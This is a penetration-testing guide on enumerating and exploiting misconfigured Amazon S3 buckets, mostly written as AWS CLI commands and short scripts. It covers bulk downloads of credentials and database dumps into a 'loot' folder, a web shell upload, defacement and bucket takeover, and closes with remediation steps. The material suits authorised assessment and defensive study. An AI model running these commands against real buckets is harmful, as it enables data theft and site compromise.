AWS S3 bucket enumeration and exploitation

S3 Bucket Enumeration and Exploitation

Discovering and exploiting misconfigured Amazon S3 buckets including enumeration techniques, permission testing, and data exfiltration methods.

Jan 27, 2026
Updated Dec 11, 2025
2 min read

Introduction

Amazon S3 (Simple Storage Service) bucket misconfigurations continue to be a significant source of data exposure in cloud environments. Despite improved defaults and security warnings, organizations may still expose sensitive data through overly permissive bucket policies, ACLs, and public access settings.

This guide covers techniques for discovering S3 buckets, testing their permissions, and exploiting misconfigurations responsibly during security assessments.

S3 Security Model

Access Control Mechanisms

S3 uses multiple overlapping access control mechanisms:

  1. Bucket Policies - JSON policies attached to buckets
  2. ACLs - Legacy access control lists
  3. Block Public Access - Account/bucket level settings
  4. IAM Policies - User/role permissions

Permission Types

PermissionEffect
s3:ListBucketList objects in bucket
s3:GetObjectDownload objects
s3:PutObjectUpload objects
s3:DeleteObjectDelete objects
s3:GetBucketAclRead bucket ACL
s3:PutBucketPolicyModify bucket policy

Bucket Discovery Techniques

Name Pattern Enumeration

# Common naming patterns
company-name
company-name-backup
company-name-dev
company-name-prod
company-name-staging
company-name-logs
company-name-assets
company-name-uploads
company-name-data
www.company.com
assets.company.com
backup.company.com

Automated Enumeration

# Using S3Scanner
s3scanner --buckets wordlist.txt

# Using bucket-finder
bucket_finder.rb --wordlist wordlist.txt

# Using cloud_enum
cloud_enum -k company -l results.txt

# Using gobuster
gobuster s3 -w wordlist.txt

DNS and Certificate Discovery

# Check CNAME records pointing to S3
dig +short assets.company.com
# s3.amazonaws.com or company.s3.amazonaws.com

# Certificate Transparency logs
# Search crt.sh for *.s3.amazonaws.com associations

# Google dorking
site:s3.amazonaws.com "company"
site:s3-*.amazonaws.com "company"

Source Code Analysis

# Search repositories for bucket references
grep -r "s3.amazonaws.com" .
grep -r "s3://" .
grep -r "\.s3\." .

# Common files to check
.env
config.js
webpack.config.js
application.properties

Web Application Analysis

# Check page source for S3 URLs
# Look in:
# - Image src attributes
# - JavaScript files
# - CSS background URLs
# - API responses

# Network tab for S3 requests
# Response headers may reveal bucket names

Permission Testing

Anonymous Access Testing

# List bucket contents (anonymous)
aws s3 ls s3://bucket-name --no-sign-request

# Download objects (anonymous)
aws s3 cp s3://bucket-name/file.txt . --no-sign-request

# Check if upload is allowed (anonymous)
echo "test" > test.txt
aws s3 cp test.txt s3://bucket-name/ --no-sign-request

Authenticated Access Testing

# With AWS credentials (any valid AWS account)
aws s3 ls s3://bucket-name
aws s3 cp s3://bucket-name/secret.txt .
aws s3 sync s3://bucket-name ./local-backup

# Check bucket ACL
aws s3api get-bucket-acl --bucket bucket-name

# Check bucket policy
aws s3api get-bucket-policy --bucket bucket-name

# List with versions (if versioning enabled)
aws s3api list-object-versions --bucket bucket-name

Policy Analysis

# Get and analyze bucket policy
aws s3api get-bucket-policy --bucket bucket-name \
    --query Policy --output text | jq .

# Check for dangerous principals:
# - "*" (anyone)
# - "AWS": "*" (any AWS account)
# - Specific account IDs you shouldn't have access to

# Check for dangerous actions:
# - s3:* (full access)
# - s3:GetObject (read all)
# - s3:PutObject (write access)

Exploitation Scenarios

Data Exfiltration

# Sync entire bucket
aws s3 sync s3://bucket-name ./loot --no-sign-request

# Download specific file types
aws s3 cp s3://bucket-name/ ./loot \
    --recursive --exclude "*" \
    --include "*.sql" --include "*.bak" --include "*.csv" \
    --no-sign-request

# Search for sensitive files
aws s3 ls s3://bucket-name --recursive | \
    grep -iE '\.(sql|bak|csv|xls|doc|pdf|key|pem|env)$'

Sensitive Data Patterns

# Files to prioritize:
# - Database dumps (.sql, .bak)
# - Configuration files (.env, config.*)
# - Credentials (.pem, .key, credentials)
# - Backups (.zip, .tar.gz)
# - Logs (*.log, access_log)
# - Source code (.git, *.js, *.py)

Website Defacement (Write Access)

# If PutObject is allowed
echo "<h1>Security Assessment</h1>" > index.html
aws s3 cp index.html s3://bucket-name/ --no-sign-request

# Upload web shell (for authorized testing only)
aws s3 cp shell.php s3://bucket-name/ --no-sign-request

Bucket Takeover

# If bucket doesn't exist but is referenced
# (e.g., in CNAME record or application code)

# 1. Try to create the bucket
aws s3 mb s3://orphaned-bucket-name

# 2. Host malicious content
echo "<script>alert('subdomain takeover')</script>" > index.html
aws s3 cp index.html s3://orphaned-bucket-name/
aws s3 website s3://orphaned-bucket-name/ --index-document index.html

Versioning Exploitation

# Check if versioning is enabled
aws s3api get-bucket-versioning --bucket bucket-name

# List all versions (may reveal deleted sensitive files)
aws s3api list-object-versions --bucket bucket-name

# Download specific version
aws s3api get-object \
    --bucket bucket-name \
    --key sensitive-file.txt \
    --version-id "version-id-here" \
    ./downloaded-file.txt

# Iterate through deleted objects
aws s3api list-object-versions --bucket bucket-name \
    --query 'DeleteMarkers[].{Key:Key,VersionId:VersionId}'

Tools

S3Scanner

# Enumerate and test buckets
pip install S3Scanner
s3scanner scan --bucket bucket-name
s3scanner dump --bucket bucket-name

AWSBucketDump

# Dump accessible bucket contents
python AWSBucketDump.py -l buckets.txt -g interesting_Keywords.txt

Bucket Finder

# Ruby-based enumeration
./bucket_finder.rb --download bucket-name

Custom Scripts

import boto3
from botocore import UNSIGNED
from botocore.config import Config

# Anonymous client
s3 = boto3.client('s3', config=Config(signature_version=UNSIGNED))

# Test bucket access
def test_bucket(bucket_name):
    try:
        response = s3.list_objects_v2(Bucket=bucket_name, MaxKeys=10)
        print(f"[OPEN] {bucket_name}: {len(response.get('Contents', []))} objects")
        return True
    except Exception as e:
        return False

# Enumerate from wordlist
with open('buckets.txt') as f:
    for bucket in f:
        test_bucket(bucket.strip())

Remediation

Immediate Actions

# Enable Block Public Access (account level)
aws s3control put-public-access-block \
    --account-id YOUR_ACCOUNT_ID \
    --public-access-block-configuration \
    "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# Enable Block Public Access (bucket level)
aws s3api put-public-access-block \
    --bucket bucket-name \
    --public-access-block-configuration \
    "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

Bucket Policy Best Practices

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DenyPublicAccess",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:*",
            "Resource": [
                "arn:aws:s3:::bucket-name",
                "arn:aws:s3:::bucket-name/*"
            ],
            "Condition": {
                "Bool": {
                    "aws:SecureTransport": "false"
                }
            }
        }
    ]
}

Monitoring

# Enable S3 access logging
# Enable CloudTrail for S3 data events
# Set up GuardDuty for anomaly detection
# Use AWS Config rules for compliance

References

MITRE ATT&CK Techniques

AWS Documentation

Security Resources

Last updated on

S3 Bucket Enumeration and Exploitation | Drake Axelrod